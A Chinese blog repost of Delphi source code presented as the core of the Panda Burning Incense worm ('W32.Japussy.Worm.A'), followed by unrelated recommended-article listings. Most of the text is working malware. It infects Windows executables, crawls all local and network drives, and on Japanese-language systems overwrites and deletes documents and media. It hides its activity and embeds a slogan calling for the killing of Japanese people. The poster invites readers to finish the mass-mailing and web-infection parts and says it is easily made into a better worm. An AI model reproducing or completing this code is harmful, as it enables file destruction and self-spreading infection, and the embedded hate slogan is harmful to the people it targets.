病毒内核

最新推荐文章于 2024-12-20 14:00:27 发布
原创 最新推荐文章于 2024-12-20 14:00:27 发布 · 326 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#integer #ext #string #delphi #function #path

[分享]熊猫烧香 病毒内核功能实现 DELPHI

  严重警告
  !!!请不要在未读懂源代码的情况下编译运行本程序,否则后果自负!!!
  program Japussy;
  uses
  Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry};
  const
  HeaderSize = 82432; 病毒体的大小
  IconOffset = $12EB8; PE文件主图标的偏移量
  在我的Delphi5 SP1上面编译得到的大小,其它版本的Delphi可能不同
  查找2800000020的十六进制字符串可以找到主图标的偏移量
  {
  HeaderSize = 38912; Upx压缩过病毒体的大小
  IconOffset = $92BC; Upx压缩过PE文件主图标的偏移量
  Upx 1.24W 用法 upx -9 --8086 Japussy.exe
  }
  IconSize = $2E8; PE文件主图标的大小--744字节
  IconTail = IconOffset + IconSize; PE文件主图标的尾部
  ID = $44444444; 感染标记
  垃圾码,以备写入
  Catchword = 'If a race need to be killed out, it must be Yamato. ' +
  'If a country need to be destroyed, it must be Japan! ' +
  ' W32.Japussy.Worm.A ';
  {$R .RES}
  function RegisterServiceProcess(dwProcessID, dwType Integer) Integer;
  stdcall; external 'Kernel32.dll'; 函数声明
  var
  TmpFile string;
  Si STARTUPINFO;
  Pi PROCESS_INFORMATION;
  IsJap Boolean = False; 日文操作系统标记
  { 判断是否为Win9x }
  function IsWin9x Boolean;
  var
  Ver TOSVersionInfo;
  begin
  Result = False;
  Ver.dwOSVersionInfoSize = SizeOf(TOSVersionInfo);
  if not GetVersionEx(Ver) then
  Exit;
  if (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then Win9x
  Result = True;
  end;
  { 在流之间复制 }
  procedure CopyStream(Src TStream; sStartPos Integer; Dst TStream;
  dStartPos Integer; Count Integer);
  var
  sCurPos, dCurPos Integer;
  begin
  sCurPos = Src.Position;
  dCurPos = Dst.Position;
  Src.Seek(sStartPos, 0);
  Dst.Seek(dStartPos, 0);
  Dst.CopyFrom(Src, Count);
  Src.Seek(sCurPos, 0);
  Dst.Seek(dCurPos, 0);
  end;
  { 将宿主文件从已感染的PE文件中分离出来,以备使用 }
  procedure ExtractFile(FileName string);
  var
  sStream, dStream TFileStream;
  begin
  try
  sStream = TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);
  try
  dStream = TFileStream.Create(FileName, fmCreate);
  try
  sStream.Seek(HeaderSize, 0); 跳过头部的病毒部分
  dStream.CopyFrom(sStream, sStream.Size - HeaderSize);
  finally
  dStream.Free;
  end;
  finally
  sStream.Free;
  end;
  except
  end;
  end;
  { 填充STARTUPINFO结构 }
  procedure FillStartupInfo(var Si STARTUPINFO; State Word);
  begin
  Si.cb = SizeOf(Si);
  Si.lpReserved = nil;
  Si.lpDesktop = nil;
  Si.lpTitle = nil;
  Si.dwFlags = STARTF_USESHOWWINDOW;
  Si.wShowWindow = State;
  Si.cbReserved2 = 0;
  Si.lpReserved2 = nil;
  end;
  { 发带毒邮件 }
  procedure SendMail;
  begin
  哪位仁兄愿意完成之?
  end;
  { 感染PE文件 }
  procedure InfectOneFile(FileName string);
  var
  HdrStream, SrcStream TFileStream;
  IcoStream, DstStream TMemoryStream;
  iID LongInt;
  aIcon TIcon;
  Infected, IsPE Boolean;
  i Integer;
  Buf array[0..1] of Char;
  begin
  try 出错则文件正在被使用,退出
  if CompareText(FileName, 'JAPUSSY.EXE') = 0 then 是自己则不感染
  Exit;
  Infected = False;
  IsPE = False;
  SrcStream = TFileStream.Create(FileName, fmOpenRead);
  try
  for i = 0 to $108 do 检查PE文件头
  begin
  SrcStream.Seek(i, soFromBeginning);
  SrcStream.Read(Buf, 2);
  if (Buf[0] = #80) and (Buf[1] = #69) then PE标记
  begin
  IsPE = True; 是PE文件
  Break;
  end;
  end;
  SrcStream.Seek(-4, soFromEnd); 检查感染标记
  SrcStream.Read(iID, 4);
  if (iID = ID) or (SrcStream.Size  10240) then 太小的文件不感染
  Infected = True;
  finally
  SrcStream.Free;
  end;
  if Infected or (not IsPE) then 如果感染过了或不是PE文件则退出
  Exit;
  IcoStream = TMemoryStream.Create;
  DstStream = TMemoryStream.Create;
  try
  aIcon = TIcon.Create;
  try
  得到被感染文件的主图标(744字节),存入流
  aIcon.ReleaseHandle;
  aIcon.Handle = ExtractIcon(HInstance, PChar(FileName), 0);
  aIcon.SaveToStream(IcoStream);
  finally
  aIcon.Free;
  end;
  SrcStream = TFileStream.Create(FileName, fmOpenRead);
  头文件
  HdrStream = TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);
  try
  写入病毒体主图标之前的数据
  CopyStream(HdrStream, 0, DstStream, 0, IconOffset);
  写入目前程序的主图标
  CopyStream(IcoStream, 22, DstStream, IconOffset, IconSize);
  写入病毒体主图标到病毒体尾部之间的数据
  CopyStream(HdrStream, IconTail, DstStream, IconTail, HeaderSize - IconTail);
  写入宿主程序
  CopyStream(SrcStream, 0, DstStream, HeaderSize, SrcStream.Size);
  写入已感染的标记
  DstStream.Seek(0, 2);
  iID = $44444444;
  DstStream.Write(iID, 4);
  finally
  HdrStream.Free;
  end;
  finally
  SrcStream.Free;
  IcoStream.Free;
  DstStream.SaveToFile(FileName); 替换宿主文件
  DstStream.Free;
  end;
  except;
  end;
  end;
  { 将目标文件写入垃圾码后删除 }
  procedure SmashFile(FileName string);
  var
  FileHandle Integer;
  i, Size, Mass, Max, Len Integer;
  begin
  try
  SetFileAttributes(PChar(FileName), 0); 去掉只读属性
  FileHandle = FileOpen(FileName, fmOpenWrite); 打开文件
  try
  Size = GetFileSize(FileHandle, nil); 文件大小
  i = 0;
  Randomize;
  Max = Random(15); 写入垃圾码的随机次数
  if Max  5 then
  Max = 5;
  Mass = Size div Max; 每个间隔块的大小
  Len = Length(Catchword);
  while i  Max do
  begin
  FileSeek(FileHandle, i  Mass, 0); 定位
  写入垃圾码,将文件彻底破坏掉
  FileWrite(FileHandle, Catchword, Len);
  Inc(i);
  end;
  finally
  FileClose(FileHandle); 关闭文件
  end;
  DeleteFile(PChar(FileName)); 删除之
  except
  end;
  end;
  { 获得可写的驱动器列表 }
  function GetDrives string;
  var
  DiskType Word;
  D Char;
  Str string;
  i Integer;
  begin
  for i = 0 to 25 do 遍历26个字母
  begin
  D = Chr(i + 65);
  Str = D + '';
  DiskType = GetDriveType(PChar(Str));
  得到本地磁盘和网络盘
  if (DiskType = DRIVE_FIXED) or (DiskType = DRIVE_REMOTE) then
  Result = Result + D;
  end;
  end;
  { 遍历目录,感染和摧毁文件 }
  procedure LoopFiles(Path, Mask string);
  var
  i, Count Integer;
  Fn, Ext string;
  SubDir TStrings;
  SearchRec TSearchRec;
  Msg TMsg;
  function IsValidDir(SearchRec TSearchRec) Integer;
  begin
  if (SearchRec.Attr  16) and (SearchRec.Name  '.') and
  (SearchRec.Name  '..') then
  Result = 0 不是目录
  else if (SearchRec.Attr = 16) and (SearchRec.Name  '.') and
  (SearchRec.Name  '..') then
  Result = 1 不是根目录
  else Result = 2; 是根目录
  end;
  begin
  if (FindFirst(Path + Mask, faAnyFile, SearchRec) = 0) then
  begin
  repeat
  PeekMessage(Msg, 0, 0, 0, PM_REMOVE); 调整消息队列,避免引起怀疑
  if IsValidDir(SearchRec) = 0 then
  begin
  Fn = Path + SearchRec.Name;
  Ext = UpperCase(ExtractFileExt(Fn));
  if (Ext = '.EXE') or (Ext = '.SCR') then
  begin
  InfectOneFile(Fn); 感染可执行文件
  end
  else if (Ext = '.HTM') or (Ext = '.HTML') or (Ext = '.ASP') then
  begin
  感染HTML和ASP文件,将Base64编码后的病毒写入
  感染浏览此网页的所有用户
  哪位大兄弟愿意完成之?
  end
  else if Ext = '.WAB' then Outlook地址簿文件
  begin
  获取Outlook邮件地址
  end
  else if Ext = '.ADC' then Foxmail地址自动完成文件
  begin
  获取Foxmail邮件地址
  end
  else if Ext = 'IND' then Foxmail地址簿文件
  begin
  获取Foxmail邮件地址
  end
  else
  begin
  if IsJap then 是倭文操作系统
  begin
  if (Ext = '.DOC') or (Ext = '.XLS') or (Ext = '.MDB') or
  (Ext = '.MP3') or (Ext = '.RM') or (Ext = '.RA') or
  (Ext = '.WMA') or (Ext = '.ZIP') or (Ext = '.RAR') or
  (Ext = '.MPEG') or (Ext = '.ASF') or (Ext = '.JPG') or
  (Ext = '.JPEG') or (Ext = '.GIF') or (Ext = '.SWF') or
  (Ext = '.PDF') or (Ext = '.CHM') or (Ext = '.AVI') then
  SmashFile(Fn); 摧毁文件
  end;
  end;
  end;
  感染或删除一个文件后睡眠200毫秒,避免CPU占用率过高引起怀疑
  Sleep(200);
  until (FindNext(SearchRec)  0);
  end;
  FindClose(SearchRec);
  SubDir = TStringList.Create;
  if (FindFirst(Path + '.', faDirectory, SearchRec) = 0) then
  begin
  repeat
  if IsValidDir(SearchRec) = 1 then
  SubDir.Add(SearchRec.Name);
  until (FindNext(SearchRec)  0);
  end;
  FindClose(SearchRec);
  Count = SubDir.Count - 1;
  for i = 0 to Count do
  LoopFiles(Path + SubDir.Strings + '', Mask);
  FreeAndNil(SubDir);
  end;
  { 遍历磁盘上所有的文件 }
  procedure InfectFiles;
  var
  DriverList string;
  i, Len Integer;
  begin
  if GetACP = 932 then 日文操作系统
  IsJap = True; 去死吧!
  DriverList = GetDrives; 得到可写的磁盘列表
  Len = Length(DriverList);
  while True do 死循环
  begin
  for i = Len downto 1 do 遍历每个磁盘驱动器
  LoopFiles(DriverList + '', '.'); 感染之
  SendMail; 发带毒邮件
  Sleep(1000  60  5); 睡眠5分钟
  end;
  end;
  { 主程序开始 }
  begin
  if IsWin9x then 是Win9x
  RegisterServiceProcess(GetCurrentProcessID, 1) 注册为服务进程
  else WinNT
  begin
  远程线程映射到Explorer进程
  哪位兄台愿意完成之?
  end;
  如果是原始病毒体自己
  if CompareText(ExtractFileName(ParamStr(0)), 'Japussy.exe') = 0 then
  InfectFiles 感染和发邮件
  else 已寄生于宿主程序上了,开始工作
  begin
  TmpFile = ParamStr(0); 创建临时文件
  Delete(TmpFile, Length(TmpFile) - 4, 4);
  TmpFile = TmpFile + #32 + '.exe'; 真正的宿主文件,多一个空格
  ExtractFile(TmpFile); 分离之
  FillStartupInfo(Si, SW_SHOWDEFAULT);
  CreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True,
  0, nil, '.', Si, Pi); 创建新进程运行之
  InfectFiles; 感染和发邮件
  end;
  end.
  -----------------------------------------------------------------------------------
  上面的代码和熊猫烧香的内核功能是一样的
  有点技巧的人 改下就能成为一个比较好的蠕虫病毒!!

内核级木马与病毒攻防:windows恶意代码分析入门
tyler_download的专栏
07-10 2425
本节帮助读者入门windows上如何对恶意软件或病毒做初步分析。分析分两种,一种叫静态分析,也就是通过直接读取病毒或恶意程序的可执行文件来分析它的运行原理,一种是动态分析,也就是在病毒或恶意程序正在运行的情况下,监视其一举一动,通过观察它在系统中的运行情况来分析它的目的和原理。 本节介绍基本的静态分析方法,该方法简单易行,但作用有限,要想跟病毒或恶意程序斗智斗勇最终还得依赖于动态分析。静态分析的第一种方法就是直线读取病毒或恶意程序的可执行文件,从中抽取关键信息。很多病毒或恶意程序的作者为了快速实现其非法目的
木马病毒清除方式
Sumarua的博客
07-11 4564
​紫狐(Purple Fox)Rootkit木马病毒,最早在2018年被网络安全人员发现,该恶意软件存在多种蠕虫化传播方式并使用驱动级维权方式,难清除是安全从业人员遇到最大的问题,在这里我们给大家提供一些入侵方式解读及清除方式。 执行方式: 清除方式: 安全模式启动 因为恶意的dll为ring-3级别的,正常情况下相关的dll无法直接删除,需要重启以安全模式才能删除,直接重启,按F8进入安全模式。删除恶意的dll文件 直接搜一下相关的dll文件,其格式为MSxxxxxxapp.dll,其中xxxxxx
电脑病毒种类、危害及防范与查杀
2402_89558164的博客
12-09 2680
7. **破坏性程序病毒**:具有好看的图标,诱使用户点击,直接破坏计算机,如格式化C盘(Harm.formatC.f)。1. **系统病毒**:这类病毒主要感染Windows操作系统的可执行文件(*.exe 和 *.dll),如CIH病毒。2. **蠕虫病毒**:通过网络或系统漏洞进行传播,具有向外发送带毒邮件和阻塞网络的能力,如冲击波和小邮差病毒。6. **后门病毒**:通过网络传播,给系统开后门,带来安全隐患,如IRC后门Backdoor.IRCBot。
常见浏览器及内核
Leeroys_Zzzz的博客
08-01 911
常见浏览器及内核 五大浏览器四大内核
主流浏览器内核
qq_39460057的博客
12-20 2217
Linux内核级木马与病毒攻防:基础工具介绍
tyler_download的专栏
07-04 1610
欲成其事先利其器。要想完成一项复杂的任务,工具的作用至关重要。要想在Linux系统上开发或研究木马病毒等特殊程序,我们需要使用一系列强大的开发和调试攻击。本节先介绍几种在Linux系统上极为强大的工具。 第一个当然是gdb了,在Linux上,它是唯一能用于程序调试的利器。我们后面开发代码或调试分析其他病毒或木马的设计模式和原理时,必须使用gdb作为手术刀,对要研究的病毒和木马进行”剖尸检验“,通过gdb调查木马或病毒的代码设计方法,同时也使用gdb加载恶意代码,研究其运转流程。 第二个是objdump,它的
进入内核态究竟是什么意思?
global_coding的博客
02-14 893
内核态,系统
Linux内核配置选项
路漫漫其修远兮
04-25 7853
http://blog.youkuaiyun.com/wdsfup/article/details/52302142http://www.manew.com/blog-166674-12962.htmlGentoo LinuxGentoo内核(gentoo-sources)特有的选项Gentoo Linux supportCONFIG_GENTOO_LINUX选"Y"后,将会自动选中那些在Gentoo环境...
linux 内核签名
qq_40227064的博客
04-28 5090
linux 驱动签名,linux内核驱动安全机制
内核基础知识
mynameNB的博客
08-20 724
什么是操作系统 (1)常见:linux、windows、android、ucos等操作系统;  (2)本质:程序,由很多源文件构成,需要编译连接成操作系统二进制程序(vmlinz、zImage); (3)作用:管理计算机硬件,给应用程序提供运行环境。 (4)核心功能: 1)内存管理。 如uboot中使用内存没有注册也没有限制, 如果不小心同块内存重复使用会出现逻辑错误, 用的内存多了, 管理非常麻烦; 有了操作系统负责内存,所有应用程序需要申请和注册,内存管理模块分配, 好处是不会冲突。...
精选资源
内核变速w7w10可用.rar
10-16
然而,由于涉及到对操作系统核心的修改,这类工具可能被误认为是病毒或恶意软件,因此在使用前确保从可信赖的源获取并进行安全扫描是至关重要的。 总的来说,"内核变速w7w10可用"的技术为用户提供了在Windows 7和...
「APT攻击」linux内核远控 - 勒索病毒.zip
11-29
在“Linux内核远控”这个场景下,攻击者可能利用系统漏洞或恶意代码对Linux系统的内核进行控制,从而实现远程操作,进而可能引发勒索病毒的传播。 【描述】中的“数据泄露”是指敏感信息未经授权被非法获取,可能...
内核病毒与木马攻防:windows上四个恶意代码和病毒程序分析实战
tyler_download的专栏
08-06 1633
本节看看如何将前面讲述的各种工具和理论应用到实践中来。我们将拿几个专门针对windows系统开发的恶意程序作为实例,用前面讲到的工具和理论具体分析其设计原理并了解它所要实现的目的。 所要分析的二进制可执行文件以及所有用到的工具可从如下链接下载链接: https://pan.baidu.com/s/1QBwGxCGjA7kYd4HchSTlWg 密码: 09g7 首先我们分析第一个恶意程序,也就是malicious-01.exe。面对exe程序时,首先要做的就是将它丢到PEView里先看看它的大概信息,打开
PLECS损耗计算-基于LCC谐振变换器的DCDC双机并联电源开环热仿真
01-06
PLECS损耗计算-基于LCC谐振变换器的DCDC双机并联电源开环热仿真内容概要:本文档主要围绕基于LCC谐振变换器的DCDC双机并联电源系统,利用PLECS软件开展开环热仿真与损耗计算的研究。通过建立系统的仿真模型,重点分析变换器在运行过程中的功率损耗分布及热特性,帮助优化电源设计中的散热管理与效率提升。文档还提及相关电力电子系统建模、热仿真方法的应用背景,强调了在高功率密度电源设计中损耗精确计算的重要性。; 适合人群:具备电力电子、电源系统设计或仿真基础,从事相关领域研究的研发人员、工程技术人员及高校研究生。; 使用场景及目标:①掌握LCC谐振变换器的工作原理及其在双机并联结构中的应用;②学习使用PLECS进行电源系统的损耗建模与热仿真分析;③优化DCDC电源的热设计与效率性能。; 阅读建议:建议读者结合PLECS仿真工具实际操作,深入理解文档中的模型搭建、参数设置与仿真流程,并关注损耗计算与热分析的关键步骤,以实现对电源系统性能的全面评估与优化。
Web开发:一图简述OAuth 2.0授权流程中的一些关键步骤
01-06
Web开发:一图简述OAuth 2.0授权流程中的一些关键步骤
GeneratedClass1151.java
01-06
GeneratedClass1151.java
测控电路习题答案-下载即用.zip
01-06
代码下载地址: https://pan.quark.cn/s/bc087ffa872a "测控电路课后习题详解"文件.pdf是一份极具价值的学术资料,其中系统地阐述了测控电路的基础理论、系统构造、核心特性及其实际应用领域。 以下是对该文献的深入解读和系统梳理:1.1测控电路在测控系统中的核心功能测控电路在测控系统的整体架构中扮演着不可或缺的角色。 它承担着对传感器输出信号进行放大、滤除杂音、提取有效信息等关键任务,并且依据测量与控制的需求,执行必要的计算、处理与变换操作,最终输出能够驱动执行机构运作的指令信号。 测控电路作为测控系统中最具可塑性的部分,具备易于放大信号、转换模式、传输数据以及适应多样化应用场景的优势。 1.2决定测控电路精确度的关键要素影响测控电路精确度的核心要素包括:(1)噪声与干扰的存在;(2)失调现象与漂移效应,尤其是温度引起的漂移;(3)线性表现与保真度水平;(4)输入输出阻抗的特性影响。 在这些要素中,噪声干扰与失调漂移(含温度效应)是最为关键的因素,需要给予高度关注。 1.3测控电路的适应性表现测控电路在测控系统中展现出高度的适应性,具体表现在:* 具备选择特定信号、灵活实施各类转换以及进行信号处理与运算的能力* 实现模数转换与数模转换功能* 在直流与交流、电压与电流信号之间进行灵活转换* 在幅值、相位、频率与脉宽信号等不同参数间进行转换* 实现量程调整功能* 对信号实施多样化的处理与运算,如计算平均值、差值、峰值、绝对值,进行求导数、积分运算等,以及实现非线性环节的线性化处理、逻辑判断等操作1.4测量电路输入信号类型对电路结构设计的影响测量电路的输入信号类型对其电路结构设计产生显著影响。 依据传感器的类型差异,输入信号的形态也呈现多样性。 主要可分为...
SAM 3模型参数,使用参数,SAM 3: 用概念分割万物
01-06
SAM 3 (Segment Anything Model 3) 是 Meta 发布的用于 可提示概念分割 (PCS) 的基础模型。在 SAM 2 的基础上,SAM 3 引入了一项全新的能力:detect、segment 和 track 通过文本提示、图像示例或两者指定的 所有实例。与之前每个提示分割单个对象的 SAM 版本不同,SAM 3 可以在图像或视频中找到并 segment 概念的每一次出现,这与现代 实例分割 中的开放词汇目标保持一致。 SAM 3 现已完全集成到 ultralytics 包,提供对概念 segment 的原生支持,支持文本提示、图像示例提示以及视频 track 功能。 SAM 3 在可提示概念分割方面比现有系统实现了 2 倍的性能提升,同时保持并改进了 SAM 2 在交互式 视觉分割方面的能力。该模型擅长开放词汇分割,允许用户使用简单的名词短语(例如,“黄色校车”、“条纹猫”)或提供目标对象的示例图像来指定概念。这些功能补充了依赖于简化 预测 和 跟踪 工作流的生产就绪管道。
利用MATLAB实现简单心率监测器和心率分析仪.zip
最新发布
01-06
1.版本:matlab2014a/2019b/2024b 2.附赠案例数据可直接运行。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。
ViTrack:Linux内核病毒跟踪开源框架
资源摘要信息: "ViTrack 是一款基于Linux内核的开源病毒和木马追踪框架。它作为一个内核级别的工具,能够帮助系统管理员和安全专家对潜在的恶意软件活动进行监控和记录。通过内嵌于Linux内核的方式,ViTrack能够在...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值